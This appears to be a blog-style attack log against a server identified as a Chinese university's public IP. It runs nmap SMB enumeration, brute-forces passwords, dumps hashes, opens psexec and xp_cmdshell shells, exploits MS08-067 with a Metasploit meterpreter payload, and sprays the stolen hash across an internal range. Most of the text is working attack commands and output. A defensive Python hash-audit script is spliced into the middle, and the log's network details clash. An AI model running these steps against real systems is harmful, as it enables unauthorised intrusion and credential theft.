Guangxi Normal University website http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc        Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb   // list the SMB scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// this uses the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser   // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2   // dump the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
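The smb-pwdump output above is worth auditing rather than just reading: the LM column alone tells a defender whether the host still stores LM hashes (NoLMHash not set) and whether a password is seven characters or shorter, because every LM hash of such a password ends in the well-known null half. The script below is an added example, not part of the original post or of the nmap scripts; it parses nmap's smb-pwdump line format, the sample lines are constructed, and only the LM null half and the empty-NT value are real published constants.

```python
import re

# Well-known constants: the LM hash of any password shorter than 8 characters ends in
# this half, and the LM hash of an empty password (or of a host with NoLMHash set) is
# this half twice.  The NT hash of an empty password is also a fixed value.
LM_NULL_HALF = "AAD3B435B51404EE"
NT_EMPTY = "31D6CFE0D16AE931B73C59D7E0C089C0"

# Matches nmap's smb-pwdump report lines: "|   user:rid => lmhash:nthash"
LINE_RE = re.compile(r"^\|_?\s*(?P<user>[^:]+):(?P<rid>\d+)\s*=>\s*(?P<lm>[^:]+):(?P<nt>.+)")


def audit_account(line):
    """Return (user, rid, findings) for one smb-pwdump line, or None if it is not one."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    user, rid, lm, nt = m.group("user", "rid", "lm", "nt")
    lm, nt = lm.strip().upper(), nt.strip().upper()
    findings = []
    if lm.startswith("NO PASSWORD") or nt.startswith("NO PASSWORD") or nt == NT_EMPTY:
        findings.append("empty password")
    elif lm != LM_NULL_HALF * 2:
        # A real LM hash means the host still stores LM hashes for this account.
        findings.append("LM hash stored")
        if lm.endswith(LM_NULL_HALF):
            findings.append("password is 7 characters or fewer")
    if rid == "500" and findings:
        findings.append("built-in Administrator account")
    return user, rid, findings


def audit_report(text):
    """Audit every smb-pwdump line of an nmap report; returns {user: (rid, findings)}."""
    results = {}
    for line in text.splitlines():
        entry = audit_account(line)
        if entry:
            results[entry[0]] = (entry[1], entry[2])
    return results


# Constructed sample in the shape nmap prints; the hashes are made up apart from the
# well-known constants above.
SAMPLE = """Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   shortpw:1002 => 0123456789ABCDEFAAD3B435B51404EE:0123456789ABCDEF0123456789ABCDEF
|   longpw:1003 => 0123456789ABCDEFFEDCBA9876543210:FEDCBA9876543210FEDCBA9876543210
|_  hardened:1004 => AAD3B435B51404EEAAD3B435B51404EE:11112222333344445555666677778888
"""

if __name__ == "__main__":
    for user, (rid, findings) in audit_report(SAMPLE).items():
        print(f"{user} (RID {rid}): {', '.join(findings) or 'no findings'}")
```

The "hardened" sample shows what the LM column looks like once LM storage is disabled: the null half twice with a real NT hash, which yields no finding.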

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe   // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"   // log in remotely as sa and execute a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241   // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole   // use msf to exploit the MS08-067 vulnerability against the target machine
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N] (ctrl+z)
msf exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator
root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// try logging in across the whole internal range with the usernames and the captured hash

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful: a simple msf + nmap attack~~